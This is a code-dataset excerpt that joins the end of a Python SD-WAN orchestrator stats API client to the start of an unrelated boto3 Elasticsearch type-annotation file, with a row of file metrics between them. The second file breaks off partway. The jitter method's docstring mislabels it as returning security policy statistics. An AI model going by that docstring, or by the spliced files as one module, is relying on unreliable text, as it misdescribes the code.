:type tunnel_name: str
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/drc/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&tunnelName={}".format(tunnel_name)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_interface_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = "all_traffic",
interface_name: str = None,
limit: int = None,
) -> list:
"""Get time series interface statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/interface/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str
:param interface_name: Filter data by interface name,
defaults to None
:type interface_name: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns list of dictionaries
:rtype: list
"""
path = (
"/stats/timeseries/interface/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
if interface_name is not None:
path = path + "&interfaceName={}".format(interface_name)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
def get_timeseries_stats_interface_overlay_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
overlay: str = None,
tunnel_type: int = None,
label_id: int = None,
is_wan_side: bool = None,
interface_name: str = None,
limit: int = None,
) -> list:
"""Get time series interface overlay statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/interfaceOverlay/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param overlay: When set to ``all``,return all bonded tunnels; when
set to ``0``, return all physical tunnels; when not used, return
all bonded and physical tunnels; otherwise, return bonded
tunnels associated with the specified overlay id,
defaults to None
:type overlay: str, optional
:param tunnel_type: Accepted values for overlays are:
``0`` – SD-WAN, ``2`` – Breakout, ``3`` – Services. Accepted
values for non-overlays are: ``1`` - Underlay, ``2`` –
Pass-through, and ``3`` – Services, defaults to None
:type tunnel_type: int, optional
:param label_id: Label internal id, defaults to None
:type label_id: int, optional
:param is_wan_side: True, Get WAN side data or False to get LAN side
data, defaults to None
:type is_wan_side: bool, optional
:param interface_name: Filter data by interface name,
defaults to None
:type interface_name: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns list of dictionaries
:rtype: list
"""
path = (
"/stats/timeseries/interfaceOverlay/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
if overlay is not None:
path = path + "&overlay={}".format(overlay)
if tunnel_type is not None:
path = path + "&tunnelType={}".format(tunnel_type)
if label_id is not None:
path = path + "&labelId={}".format(label_id)
if is_wan_side is not None:
path = path + "&isWanSide={}".format(is_wan_side)
if interface_name is not None:
path = path + "&interfaceName={}".format(interface_name)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
def get_timeseries_stats_mos_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
tunnel_name: str,
limit: int = None,
) -> list:
"""Get time series MOS statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/mos/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param tunnel_name: Filter for data which belongs to tunnel with
matching name
:type tunnel_name: str
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns list of dictionaries
:rtype: list
"""
path = (
"/stats/timeseries/mos/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&tunnel={}".format(tunnel_name)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
def get_timeseries_stats_application(
self,
start_time: int,
end_time: int,
application: str,
group_pk: str = None,
data_format: str = None,
total: bool = None,
latest: int = None,
) -> dict:
"""Get time series application statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/application2
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param application: Filter for data belonging to appliaction with
matching name
:type application: str
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param total: Get application's total value if True,
defaults to None
:type total: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/application2?startTime="
+ "{}&endTime={}&application={}".format(
start_time, end_time, application
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
if data_format is not None:
path = path + "&format={}".format(data_format)
if total is not None:
path = path + "&total={}".format(total)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_application_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
application: str,
data_format: str = None,
total: bool = None,
latest: int = None,
) -> dict:
"""Get time series application statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/application2
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param application: Filter for data belonging to appliaction with
matching name
:type application: str
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param total: Get application's total value if True,
defaults to None
:type total: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/application2?startTime="
+ "{}&endTime={}&application={}".format(
start_time, end_time, application
)
)
if data_format is not None:
path = path + "&format={}".format(data_format)
if total is not None:
path = path + "&total={}".format(total)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_application_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
application: str,
total: bool = None,
data_format: str = None,
) -> dict:
"""Get time series application statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/application2/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param application: Filter for data belonging to appliaction with
matching name
:type application: str
:param total: Get application's total value if True,
defaults to None
:type total: bool, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/application2/"
+ "{}?startTime={}&endTime={}&application={}".format(
ne_pk, start_time, end_time, application
)
)
if total is not None:
path = path + "&total={}".format(total)
if data_format is not None:
path = path + "&format={}".format(data_format)
return self._get(path)
def get_timeseries_stats_boost_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
limit: int = None,
) -> list:
"""Get time series boost statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/boost/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns list of dictionaries
:rtype: list
"""
path = (
"/stats/timeseries/boost/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
def get_timeseries_stats_security_policy_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
from_zone: str,
to_zone: str,
) -> dict:
"""Get time series security policy statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/securityPolicy/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param from_zone: Filter for data which come from the zone indicated
by this zone internal ID
:type from_zone: str
:param to_zone: Filter for data which go to the zone indicated by
this zone internal ID
:type to_zone: str
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/securityPolicy/"
+ "{}?startTime={}&endTime={}".format(
ne_pk, start_time, end_time
)
+ "&granularity={}&fromZone={}&toZone={}".format(
granularity, from_zone, to_zone
)
)
return self._get(path)
def get_timeseries_stats_jitter_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
tunnel_name: str,
data_format: str = None,
limit: int = None,
) -> dict:
"""Get time series security policy statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/jitter/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param tunnel_name: Filter for data which belongs to specified
tunnel name
:type tunnel_name: str
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/jitter/"
+ "{}?startTime={}&endTime={}&granularity={}&tunnel={}".format(
ne_pk, start_time, end_time, granularity, tunnel_name
)
)
if data_format is not None:
path = path + "&format={}".format(data_format)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
| 36.352965 | 76 | 0.650326 | 11,880 | 88,265 | 4.744697 | 0.022475 | 0.021396 | 0.018202 | 0.031614 | 0.970213 | 0.964163 | 0.962797 | 0.961201 | 0.956216 | 0.951603 | 0 | 0.005966 | 0.261293 | 88,265 | 2,427 | 77 | 36.367944 | 0.858455 | 0.674344 | 0 | 0.824769 | 0 | 0 | 0.147488 | 0.086078 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039526 | false | 0 | 0 | 0 | 0.079051 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
311364fbfbc93440b102279ab223a3267848d616 | 203,400 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/es/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/es/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/es/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def add_tags(self, ARN: str, TagList: List):
"""
Attaches tags to an existing Elasticsearch domain. Tags are a set of case-sensitive key value pairs. An Elasticsearch domain may have up to 10 tags. See `Tagging Amazon Elasticsearch Service Domains for more information. <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-awsresorcetagging>`__
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/AddTags>`_
**Request Syntax**
::
response = client.add_tags(
ARN='string',
TagList=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ARN: string
:param ARN: **[REQUIRED]**
Specify the ``ARN`` for which you want to add the tags.
:type TagList: list
:param TagList: **[REQUIRED]**
List of ``Tag`` that need to be added for the Elasticsearch domain.
- *(dict) --*
Specifies a key value pair for a resource tag.
- **Key** *(string) --* **[REQUIRED]**
Specifies the ``TagKey`` , the name of the tag. Tag keys must be unique for the Elasticsearch domain to which they are attached.
- **Value** *(string) --* **[REQUIRED]**
Specifies the ``TagValue`` , the value assigned to the corresponding tag key. Tag values can be null and do not have to be unique in a tag set. For example, you can have a key value pair in a tag set of ``project : Trinity`` and ``cost-center : Trinity``
:returns: None
"""
pass
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def cancel_elasticsearch_service_software_update(self, DomainName: str) -> Dict:
"""
Cancels a scheduled service software update for an Amazon ES domain. You can only perform this operation before the ``AutomatedUpdateDate`` and when the ``UpdateStatus`` is in the ``PENDING_UPDATE`` state.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/CancelElasticsearchServiceSoftwareUpdate>`_
**Request Syntax**
::
response = client.cancel_elasticsearch_service_software_update(
DomainName='string'
)
**Response Syntax**
::
{
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
The result of a ``CancelElasticsearchServiceSoftwareUpdate`` operation. Contains the status of the update.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch service software update.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update you service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the domain that you want to stop the latest service software update on.
:rtype: dict
:returns:
"""
pass
def create_elasticsearch_domain(self, DomainName: str, ElasticsearchVersion: str = None, ElasticsearchClusterConfig: Dict = None, EBSOptions: Dict = None, AccessPolicies: str = None, SnapshotOptions: Dict = None, VPCOptions: Dict = None, CognitoOptions: Dict = None, EncryptionAtRestOptions: Dict = None, NodeToNodeEncryptionOptions: Dict = None, AdvancedOptions: Dict = None, LogPublishingOptions: Dict = None) -> Dict:
"""
Creates a new Elasticsearch domain. For more information, see `Creating Elasticsearch Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomains>`__ in the *Amazon Elasticsearch Service Developer Guide* .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/CreateElasticsearchDomain>`_
**Request Syntax**
::
response = client.create_elasticsearch_domain(
DomainName='string',
ElasticsearchVersion='string',
ElasticsearchClusterConfig={
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
EBSOptions={
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
AccessPolicies='string',
SnapshotOptions={
'AutomatedSnapshotStartHour': 123
},
VPCOptions={
'SubnetIds': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
CognitoOptions={
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
EncryptionAtRestOptions={
'Enabled': True|False,
'KmsKeyId': 'string'
},
NodeToNodeEncryptionOptions={
'Enabled': True|False
},
AdvancedOptions={
'string': 'string'
},
LogPublishingOptions={
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
}
)
**Response Syntax**
::
{
'DomainStatus': {
'DomainId': 'string',
'DomainName': 'string',
'ARN': 'string',
'Created': True|False,
'Deleted': True|False,
'Endpoint': 'string',
'Endpoints': {
'string': 'string'
},
'Processing': True|False,
'UpgradeProcessing': True|False,
'ElasticsearchVersion': 'string',
'ElasticsearchClusterConfig': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'EBSOptions': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'AccessPolicies': 'string',
'SnapshotOptions': {
'AutomatedSnapshotStartHour': 123
},
'VPCOptions': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
